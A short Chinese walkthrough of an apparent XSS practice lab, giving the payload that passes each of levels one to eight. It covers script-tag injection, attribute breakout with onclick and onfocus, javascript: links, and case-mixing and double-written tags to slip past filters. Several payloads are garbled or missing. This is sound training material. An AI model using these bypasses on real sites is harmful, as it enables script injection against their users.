第一关
可以发现url为test
构建payload,将test改为<script>alert()</script>,按回车.
第二关
构造一个onclick属性," οnclick="alert(123)
第三关
利用onclick事件绕过,输入框输入 'οnclick='alert(1)
点击输入框完成本关
第四关
输入payload点击搜索后查看源代码
通过输入框后发现之前的payload变成了script alert()/script,于是我们可以猜想"<>"符号可能被实体化
利用onclick语句绕过,输入框输入
"οnclick="alert(1)
完成本关
第五关
输入<script>alert(1)</script>发现script被处理
意味着不能输入script标签了,换思路,用事件" οnfοcus="alert(1)
还是被处理,试试逃逸输入框,用其他标签来试试:
"><a href="javascript:alert(1)">jack</a>
输入后点击jack显示本关已完成。
第六关
输入<script>alert(1)</script>发现script被处理
尝试大小写绕过:">jack,通关成功
第七关
script直接被过滤
尝试双写绕过,alert(1),发现仍然不起作用
接下来 尝试闭合+双写,发现可以通关。
payload为
"><scrscriptipt>alert(1)</scscriptript>
第八关
发现被过滤了
unicode是支持所有的编码,尝试转换编码
unicode编码为:
javascript:alert(1)
输入Unicode编码后,通关成功。
第九关